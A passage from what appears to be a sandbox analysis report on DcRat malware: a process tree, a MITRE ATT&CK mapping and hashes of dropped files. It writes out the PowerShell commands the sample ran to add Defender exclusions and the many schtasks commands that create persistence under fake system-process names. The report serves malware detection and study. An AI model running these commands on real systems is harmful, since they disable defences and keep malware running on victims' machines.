  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\OSPPSVC.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\OSPPSVC.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Favorites\lsass.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\Idle.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\es-ES\sppsvc.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\wininit.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZIwY3l9Tbx.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:2968
- - C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
    "C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2676
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\674c385e-66b5-45b5-9189-a5b397ddd042.vbs"
      4⤵
      PID:2860
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9cd71340-e437-49e2-b46f-57e7cf4a21df.vbs"
      4⤵
      PID:700
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://localhost:12274/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2516
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2516 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb" /sc ONLOGON /tr "'C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Videos\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\OSPPSVC.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\OSPPSVC.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\tracing\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\tracing\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\tracing\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Favorites\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Favorites\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fbd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\es-ES\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\es-ES\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\es-ES\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\OSPPSVC.exe

Filesize
3.0MB

MD5
01c2c079f59b6d828fc09a1181bf952b

SHA1
80fac94b6c89134209870229e585662bf0680dac

SHA256
9723c151852728d011b350ddc7cf7b05596155aceeaa4d4a755b68b73e0375fa

SHA512
0673586e65367db9ca9367fad13ea315f4af60c7b460639a2f381aad095d592e116c369dc20fb0e7b94e060336a2a4a0bfe26ca40b7b4141435d3519909b1fd2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3ba05ddf5dbe0f6c9893669807d9e49c

SHA1
bafd20fd9e7ea6d8ed563da280ac7e1fe1f06c02

SHA256
9e328e6394875eadd7b5afa4bbb775817df72b8ed4a1148d6cf6e3e18eff8110

SHA512
e310261a117836ad812a3e56cc87f9afaa83b471d47ee175196ea3dfec6173363a2f3e9b4f8a526566866b8cd5d683c8993d2b48f3e14f86358073c55b208da7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b51544e20d654b78edd403bcd923e233

SHA1
20a6c16b7f485ea8502d239132e79da7825b434f

SHA256
793d293f19b17d668298d1ee8236849c95e6448535030e303f37e48471197b4b

SHA512
ccefd7869e551b6fddfea8396dddf78ae5fb0036f07af2549d04d766ec971ee19b6d21cda3213ebd432574c911ea76472e294fa911cb0c831e78633dae127857

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e7e9f504f971a8449442be9c68b9e305

SHA1
1ff02c963ce16dc77a2b99d157634d87af945e88

SHA256
7b87b8e8483481ea073c3787cdce444fbea72441f539d9bb5aae8f206f0580c5

SHA512
b1026529a36210d7ee88ed13c12621d0b22bcdb2fac7ecd8542189d323f9f0d5afe1190953c926f07002772aa629a4eda889cd7c23b261f74a18f7b27db0799b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1d527025ce4ecc7a1b814f7703dd512f

SHA1
ef160e57b0a000a09962a9f2b8f6dc2e447fa522

SHA256
fe6086af227a5951d5222ae5c34bf420b15188e2d693226497604a6d4922e239

SHA512
112edeec8f9b05b880824618bc3b7ddd95c5cef7c33d7bea87b01dc80784de60cbf75dfe77e152252d603351be82f63ecff4ba43a4868207f7331969f0f10d77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
49f62d6be3affab9273ebac1291c1bb9

SHA1
44a70e7dad6adbf21ebb751845496b18869772f6

SHA256
10cf9718d2631612ce33f64052724e2978f6ec931c05ebe312ac7f8b9e837452

SHA512
a5e13691cb2e21573245ec54e1591c242940eafefcc9ed6c7d3bf391a8a6855777ee8757df4a07c620d9ec29dc8990a2913388d370989b1ce915601cf1a28158

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
86b6f3bceb2b729036c03c1748d95a5e

SHA1
d7b378ac71ec29c862f261582ded9de889e6b723

SHA256
f35f2af9c190096e9199781ed15b5ee6e97d09347dcf7d850dd831df0ccb8bd6

SHA512
a8705e160f388980cee74bf44e213f3995f9ec020cd539bf070a9c4c4a7d76ac1f5bea2942a8a4f5e57893c016676562b078a03fbd0f2bff440c3b9180852656

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
235c0b6c23e058651212e54121763a88

SHA1
07d6e9612720bcddd67f0cf97f21bc202e01c135

SHA256
3ce38b5a8d7ca379bf93b2aa73176fb3cc122f2bcc0f505ca33978d9cf74d2f0

SHA512
63b4365245853155ac370a00866a6aa588350e466d0b52ece1f2447b7963adbd9e89dd40f9a8bd08a7cf54a39e036772e283aeeb6992ceeafe90370ced4f655c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7a1bc2871ee68c6df02245bc82f97c1a

SHA1
abad35fedaa753c48ed321a0bc36ba6d75c8cb50

SHA256
a818e508b471138e23b17c2ba91d1efd08f0ee95d094ca5c1803eb992ee20132

SHA512
9a5475919b6c8ff931545a506e753f5d7fdee3fb860e1f2d6944ed9c75c845cdbdf5531683444ab2dbad6fd08a2476cc2888a1bff5bf2f558a0389e6add5c8f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ffb59d8ade3b044b02df3b83e8522fe4

SHA1
2dffb8474c7153e9e16c7d6932473c0259908e15

SHA256
f28532c56701105d495ab912e708b92d91b3eb470c6a3cc9eeb9e090cceb4690

SHA512
0618549f0ea4de21fb645d1d1c374823ccb8d0c506dc1375f977f36fa427493aac2306c13d6680102a25655a0ab655a3e115d7fb4f81abc6585ca437a2619d99

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
07eaf62e46f561b402e1099a470088aa

SHA1
8c30df7304ee42f67eba4ebc9ebb7c499794ca6b

SHA256
f58a265c5a3429939a8248d3ad1d90b851981b832c26414b44ac56d1dd05959d

SHA512
fedccb6b1503d5c0b0304aacb79700362ae3eec13c91d89ee1051d3d9d9a63bfcbec4080afc3662afa52e485231797c4c38797ea7d1f631c00964e55821856b0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
22e31a40c8f8afa5d5aba89419d8dccf

SHA1
b2032fa5ee87ed6becf3b076024c6a7d64afb62d

SHA256
